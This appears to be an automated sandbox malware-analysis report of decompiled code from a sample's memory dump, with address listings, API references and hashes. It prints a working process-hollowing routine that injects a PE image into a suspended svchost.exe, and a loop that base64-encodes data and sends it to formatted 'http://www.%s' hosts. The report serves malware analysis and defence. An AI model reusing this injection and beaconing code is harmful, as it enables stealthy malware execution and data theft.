                                                                                                                                                                                                                                                                                          					_v44 = _v28;
                                                                                                                                                                                                                                                                                          					while(_v44 <= _v24 && (( *(_v12 + 0x28) & 0x000000ff) != 0 || WaitForSingleObject( *(_v12 + 0x24), 0xa) != 0)) {
                                                                                                                                                                                                                                                                                          						_v64 = _v44 * 0x28 + _v36;
                                                                                                                                                                                                                                                                                          						_v52 = 0x100000;
                                                                                                                                                                                                                                                                                          						_t306 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          						_v48 = _t306;
                                                                                                                                                                                                                                                                                          						_t307 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          						_v56 = _t307;
                                                                                                                                                                                                                                                                                          						_t308 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          						_v60 = _t308;
                                                                                                                                                                                                                                                                                          						if(_v48 == 0 || _v56 == 0 || _v60 == 0) {
                                                                                                                                                                                                                                                                                          							L82:
                                                                                                                                                                                                                                                                                          							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v68 = _v48;
                                                                                                                                                                                                                                                                                          							_v80 = 0;
                                                                                                                                                                                                                                                                                          							while(_v80 < 0x100) {
                                                                                                                                                                                                                                                                                          								_v80 = _v80 + 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                                          							if( *0x40118a4 == 2 &&  *((intOrPtr*)(_v16 + 0x453)) > 0 &&  *((intOrPtr*)(_v16 + 0x453)) < 0x100000 - _v72 &&  *((intOrPtr*)(_v16 + 0x457)) != 0) {
                                                                                                                                                                                                                                                                                          								 *_v68 =  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                                          								_v68 = _v68 + 4;
                                                                                                                                                                                                                                                                                          								E04007B70(_v68,  *((intOrPtr*)(_v16 + 0x457)),  *((intOrPtr*)(_v16 + 0x453)));
                                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                                          								_v68 = _v68 +  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                                          							_t312 = E04008370(_v48, _v72, _v56, 0x100000); // executed
                                                                                                                                                                                                                                                                                          							_t638 = _t638 + 0x10;
                                                                                                                                                                                                                                                                                          							_v76 = _t312;
                                                                                                                                                                                                                                                                                          							if(_v76 <= 0) {
                                                                                                                                                                                                                                                                                          								L81:
                                                                                                                                                                                                                                                                                          								VirtualFree(_v48, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								VirtualFree(_v56, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								VirtualFree(_v60, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								goto L82;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v424 = "http://www.%s";
                                                                                                                                                                                                                                                                                          								_t318 = lstrlenA(_v64);
                                                                                                                                                                                                                                                                                          								if(_t318 + lstrlenA(_v424) >= 0x100) {
                                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								wsprintfA( &_v420, _v424, _v64);
                                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                                          								_v428 = 0x100000;
                                                                                                                                                                                                                                                                                          								if(CryptBinaryToStringA(_v56, _v76, 0x40000001, _v60,  &_v428) == 0) {
                                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v956 = 0;
                                                                                                                                                                                                                                                                                          								_v432 = 0;
                                                                                                                                                                                                                                                                                          								MultiByteToWideChar(1, 1,  &_v420, 0xffffffff,  &_v948, 0x100);
                                                                                                                                                                                                                                                                                          								_v952 = 0;
                                                                                                                                                                                                                                                                                          								_t328 = E040017D0( &_v420,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                                          								_v436 = _t328;
                                                                                                                                                                                                                                                                                          								if(_v436 <= 0) {
                                                                                                                                                                                                                                                                                          									L79:
                                                                                                                                                                                                                                                                                          									if(_v956 != 0) {
                                                                                                                                                                                                                                                                                          										VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_v436 < 0x100 || _v952 >= 0x1f4) {
                                                                                                                                                                                                                                                                                          									if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                                          										goto L70;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          									_v956 = 0;
                                                                                                                                                                                                                                                                                          									_v432 = 0;
                                                                                                                                                                                                                                                                                          									_v960 = 0;
                                                                                                                                                                                                                                                                                          									while(_v960 < 4) {
                                                                                                                                                                                                                                                                                          										_t358 = E040017D0(_v428,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                                          										_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                                          										_v436 = _t358;
                                                                                                                                                                                                                                                                                          										if(_v436 > 0x100 || _v952 < 0x1f4) {
                                                                                                                                                                                                                                                                                          											goto L70;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_v960 = _v960 + 1;
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L70;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									L70:
                                                                                                                                                                                                                                                                                          									if(_v436 > 0) {
                                                                                                                                                                                                                                                                                          										EnterCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                                          										if( *(_v12 + 4) != 0) {
                                                                                                                                                                                                                                                                                          											_v968 =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                                          											_t333 = VirtualAlloc(0, _v968, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          											_v964 = _t333;
                                                                                                                                                                                                                                                                                          											if(_v964 != 0) {
                                                                                                                                                                                                                                                                                          												if(GetTickCount() % 2 != 0) {
                                                                                                                                                                                                                                                                                          													E04007B70(_v964, _v956, _v436);
                                                                                                                                                                                                                                                                                          													E04007B70(_v964 + _v436,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                                          													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													E04007B70(_v964,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                                          													E04007B70(_v964 +  *(_v12 + 8), _v956, _v436);
                                                                                                                                                                                                                                                                                          													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												 *(_v12 + 8) =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                                          												VirtualFree( *(_v12 + 4), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          												 *(_v12 + 4) = _v964;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t351 = VirtualAlloc(0, _v436, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          											 *(_v12 + 4) = _t351;
                                                                                                                                                                                                                                                                                          											E04007B70( *(_v12 + 4), _v956, _v436);
                                                                                                                                                                                                                                                                                          											_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                                          											 *(_v12 + 8) = _v436;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										LeaveCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L79;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L83;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
























































                                                                                                                                                                                                                                                                                          0x04004bac
                                                                                                                                                                                                                                                                                          0x04004bb5
                                                                                                                                                                                                                                                                                          0x04004bbc
                                                                                                                                                                                                                                                                                          0x040056f0
                                                                                                                                                                                                                                                                                          0x040056f0
                                                                                                                                                                                                                                                                                          0x040056fc
                                                                                                                                                                                                                                                                                          0x04004bc2
                                                                                                                                                                                                                                                                                          0x04004bcc
                                                                                                                                                                                                                                                                                          0x04004bd1
                                                                                                                                                                                                                                                                                          0x04004bdb
                                                                                                                                                                                                                                                                                          0x04004be1
                                                                                                                                                                                                                                                                                          0x04004beb
                                                                                                                                                                                                                                                                                          0x04004bf9
                                                                                                                                                                                                                                                                                          0x04004c31
                                                                                                                                                                                                                                                                                          0x04004c34
                                                                                                                                                                                                                                                                                          0x04004c49
                                                                                                                                                                                                                                                                                          0x04004c4f
                                                                                                                                                                                                                                                                                          0x04004c60
                                                                                                                                                                                                                                                                                          0x04004c66
                                                                                                                                                                                                                                                                                          0x04004c77
                                                                                                                                                                                                                                                                                          0x04004c7d
                                                                                                                                                                                                                                                                                          0x04004c84
                                                                                                                                                                                                                                                                                          0x040056eb
                                                                                                                                                                                                                                                                                          0x04004bf6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004c9e
                                                                                                                                                                                                                                                                                          0x04004ca1
                                                                                                                                                                                                                                                                                          0x04004ca4
                                                                                                                                                                                                                                                                                          0x04004cb6
                                                                                                                                                                                                                                                                                          0x04004cb3
                                                                                                                                                                                                                                                                                          0x04004cb3
                                                                                                                                                                                                                                                                                          0x040052a8
                                                                                                                                                                                                                                                                                          0x040052b2
                                                                                                                                                                                                                                                                                          0x040052eb
                                                                                                                                                                                                                                                                                          0x040052f3
                                                                                                                                                                                                                                                                                          0x0400530e
                                                                                                                                                                                                                                                                                          0x04005313
                                                                                                                                                                                                                                                                                          0x04005322
                                                                                                                                                                                                                                                                                          0x04005322
                                                                                                                                                                                                                                                                                          0x0400532b
                                                                                                                                                                                                                                                                                          0x0400533f
                                                                                                                                                                                                                                                                                          0x04005344
                                                                                                                                                                                                                                                                                          0x04005347
                                                                                                                                                                                                                                                                                          0x0400534e
                                                                                                                                                                                                                                                                                          0x040056b8
                                                                                                                                                                                                                                                                                          0x040056c3
                                                                                                                                                                                                                                                                                          0x040056d4
                                                                                                                                                                                                                                                                                          0x040056e5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005354
                                                                                                                                                                                                                                                                                          0x04005354
                                                                                                                                                                                                                                                                                          0x04005362
                                                                                                                                                                                                                                                                                          0x0400537f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005397
                                                                                                                                                                                                                                                                                          0x0400539d
                                                                                                                                                                                                                                                                                          0x040053a0
                                                                                                                                                                                                                                                                                          0x040053ca
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040053d0
                                                                                                                                                                                                                                                                                          0x040053da
                                                                                                                                                                                                                                                                                          0x040053fd
                                                                                                                                                                                                                                                                                          0x04005403
                                                                                                                                                                                                                                                                                          0x04005439
                                                                                                                                                                                                                                                                                          0x0400543e
                                                                                                                                                                                                                                                                                          0x04005441
                                                                                                                                                                                                                                                                                          0x0400544e
                                                                                                                                                                                                                                                                                          0x0400569b
                                                                                                                                                                                                                                                                                          0x040056a2
                                                                                                                                                                                                                                                                                          0x040056b2
                                                                                                                                                                                                                                                                                          0x040056b2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040056a2
                                                                                                                                                                                                                                                                                          0x0400545e
                                                                                                                                                                                                                                                                                          0x04005477
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400548b
                                                                                                                                                                                                                                                                                          0x04005491
                                                                                                                                                                                                                                                                                          0x0400549b
                                                                                                                                                                                                                                                                                          0x040054a5
                                                                                                                                                                                                                                                                                          0x040054c0
                                                                                                                                                                                                                                                                                          0x040054f5
                                                                                                                                                                                                                                                                                          0x040054fa
                                                                                                                                                                                                                                                                                          0x040054fd
                                                                                                                                                                                                                                                                                          0x0400550d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400551d
                                                                                                                                                                                                                                                                                          0x040054ba
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040054ba
                                                                                                                                                                                                                                                                                          0x0400550d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400551f
                                                                                                                                                                                                                                                                                          0x0400551f
                                                                                                                                                                                                                                                                                          0x04005526
                                                                                                                                                                                                                                                                                          0x04005533
                                                                                                                                                                                                                                                                                          0x04005540
                                                                                                                                                                                                                                                                                          0x04005598
                                                                                                                                                                                                                                                                                          0x040055ae
                                                                                                                                                                                                                                                                                          0x040055b4
                                                                                                                                                                                                                                                                                          0x040055c1
                                                                                                                                                                                                                                                                                          0x040055d8
                                                                                                                                                                                                                                                                                          0x04005631
                                                                                                                                                                                                                                                                                          0x04005654
                                                                                                                                                                                                                                                                                          0x04005659
                                                                                                                                                                                                                                                                                          0x040055da
                                                                                                                                                                                                                                                                                          0x040055ef
                                                                                                                                                                                                                                                                                          0x04005612
                                                                                                                                                                                                                                                                                          0x04005617
                                                                                                                                                                                                                                                                                          0x04005617
                                                                                                                                                                                                                                                                                          0x0400566b
                                                                                                                                                                                                                                                                                          0x0400567c
                                                                                                                                                                                                                                                                                          0x0400568b
                                                                                                                                                                                                                                                                                          0x0400568b
                                                                                                                                                                                                                                                                                          0x04005542
                                                                                                                                                                                                                                                                                          0x04005552
                                                                                                                                                                                                                                                                                          0x0400555b
                                                                                                                                                                                                                                                                                          0x04005573
                                                                                                                                                                                                                                                                                          0x04005578
                                                                                                                                                                                                                                                                                          0x04005584
                                                                                                                                                                                                                                                                                          0x04005584
                                                                                                                                                                                                                                                                                          0x04005695
                                                                                                                                                                                                                                                                                          0x04005695
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005526
                                                                                                                                                                                                                                                                                          0x0400545e
                                                                                                                                                                                                                                                                                          0x0400534e
                                                                                                                                                                                                                                                                                          0x04004c84
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004bf9

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04004BAC
                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 04004BDB
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 04004C19
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C49
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C60
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C77
                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040056F0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                                          • String ID: $`$pigalicapi
                                                                                                                                                                                                                                                                                          • API String ID: 1834614700-42206024
                                                                                                                                                                                                                                                                                          • Opcode ID: 0b588b8632747e3a4410319c3fb32f93fea484f2e03b927fbc22a93c38a5764c
                                                                                                                                                                                                                                                                                          • Instruction ID: f4bd0befb8abd7887e3d73177c72bf7f141d25b4899fa760b57ca1a426edb567
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b588b8632747e3a4410319c3fb32f93fea484f2e03b927fbc22a93c38a5764c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39628DB1D00218ABFB14DBA0DC84FEDB7B9AF49309F04C559E6057B281E775AA84CF61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040020B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                                          				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1016;
                                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                                          				void _v1100;
                                                                                                                                                                                                                                                                                          				signed int _v1104;
                                                                                                                                                                                                                                                                                          				CHAR* _t121;
                                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                                          				int _t130;
                                                                                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                                                                                          				int _t140;
                                                                                                                                                                                                                                                                                          				int _t143;
                                                                                                                                                                                                                                                                                          				int _t145;
                                                                                                                                                                                                                                                                                          				int _t148;
                                                                                                                                                                                                                                                                                          				void* _t180;
                                                                                                                                                                                                                                                                                          				void* _t263;
                                                                                                                                                                                                                                                                                          				void* _t265;
                                                                                                                                                                                                                                                                                          				void* _t266;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                                                                                          					L26:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                                          				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                                          				if(_a12 != 0) {
                                                                                                                                                                                                                                                                                          					lstrcatA( &_v276, " ");
                                                                                                                                                                                                                                                                                          					_t121 = lstrcatA( &_v276, _a12);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E04007D20(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                                          				E04007D20( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                                          				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                                          				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                                          				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                                          				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                          				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                                          				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                                          				_v12 = _t128;
                                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                                          					if(_t130 != 0) {
                                                                                                                                                                                                                                                                                          						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                                          						_v1100 = _t132;
                                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                                                                                          							E04007B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                                          							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                                          							_v1104 = 0;
                                                                                                                                                                                                                                                                                          							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                          								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							E040026D0(_v12, _v1100);
                                                                                                                                                                                                                                                                                          							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                                          							if(_t140 != 0) {
                                                                                                                                                                                                                                                                                          								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                                          								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                                          								if(_t143 != 0) {
                                                                                                                                                                                                                                                                                          									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                                          									if(_t145 != 0) {
                                                                                                                                                                                                                                                                                          										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                                          										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                                          										if(_t148 == 0) {
                                                                                                                                                                                                                                                                                          											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                                          										return _v1012.hProcess;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t180 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40); // executed
                                                                                                                                                                                                                                                                                          						_v1100 = _t180;
                                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                          						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                                          						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

























                                                                                                                                                                                                                                                                                          0x040020bd
                                                                                                                                                                                                                                                                                          0x04002502
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002502
                                                                                                                                                                                                                                                                                          0x040020d4
                                                                                                                                                                                                                                                                                          0x040020e6
                                                                                                                                                                                                                                                                                          0x040020f0
                                                                                                                                                                                                                                                                                          0x040020fe
                                                                                                                                                                                                                                                                                          0x0400210f
                                                                                                                                                                                                                                                                                          0x0400210f
                                                                                                                                                                                                                                                                                          0x04002120
                                                                                                                                                                                                                                                                                          0x04002133
                                                                                                                                                                                                                                                                                          0x04002138
                                                                                                                                                                                                                                                                                          0x0400213b
                                                                                                                                                                                                                                                                                          0x0400214e
                                                                                                                                                                                                                                                                                          0x04002168
                                                                                                                                                                                                                                                                                          0x04002177
                                                                                                                                                                                                                                                                                          0x04002187
                                                                                                                                                                                                                                                                                          0x0400218d
                                                                                                                                                                                                                                                                                          0x04002194
                                                                                                                                                                                                                                                                                          0x040021c0
                                                                                                                                                                                                                                                                                          0x040021c8
                                                                                                                                                                                                                                                                                          0x040021fe
                                                                                                                                                                                                                                                                                          0x04002204
                                                                                                                                                                                                                                                                                          0x04002211
                                                                                                                                                                                                                                                                                          0x0400227d
                                                                                                                                                                                                                                                                                          0x0400228f
                                                                                                                                                                                                                                                                                          0x04002294
                                                                                                                                                                                                                                                                                          0x04002297
                                                                                                                                                                                                                                                                                          0x040022b2
                                                                                                                                                                                                                                                                                          0x040022ce
                                                                                                                                                                                                                                                                                          0x0400235e
                                                                                                                                                                                                                                                                                          0x04002363
                                                                                                                                                                                                                                                                                          0x040022d0
                                                                                                                                                                                                                                                                                          0x04002312
                                                                                                                                                                                                                                                                                          0x04002317
                                                                                                                                                                                                                                                                                          0x04002317
                                                                                                                                                                                                                                                                                          0x040022ac
                                                                                                                                                                                                                                                                                          0x040022ac
                                                                                                                                                                                                                                                                                          0x04002376
                                                                                                                                                                                                                                                                                          0x04002396
                                                                                                                                                                                                                                                                                          0x0400239e
                                                                                                                                                                                                                                                                                          0x040023ec
                                                                                                                                                                                                                                                                                          0x040023f2
                                                                                                                                                                                                                                                                                          0x0400240a
                                                                                                                                                                                                                                                                                          0x04002412
                                                                                                                                                                                                                                                                                          0x04002460
                                                                                                                                                                                                                                                                                          0x04002468
                                                                                                                                                                                                                                                                                          0x040024a6
                                                                                                                                                                                                                                                                                          0x040024ba
                                                                                                                                                                                                                                                                                          0x040024c2
                                                                                                                                                                                                                                                                                          0x040024e2
                                                                                                                                                                                                                                                                                          0x040024ef
                                                                                                                                                                                                                                                                                          0x040024fc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040024fc
                                                                                                                                                                                                                                                                                          0x040024cb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040024d1
                                                                                                                                                                                                                                                                                          0x04002473
                                                                                                                                                                                                                                                                                          0x04002480
                                                                                                                                                                                                                                                                                          0x0400248d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002493
                                                                                                                                                                                                                                                                                          0x0400241d
                                                                                                                                                                                                                                                                                          0x0400242a
                                                                                                                                                                                                                                                                                          0x04002437
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400243d
                                                                                                                                                                                                                                                                                          0x040023a9
                                                                                                                                                                                                                                                                                          0x040023b6
                                                                                                                                                                                                                                                                                          0x040023c3
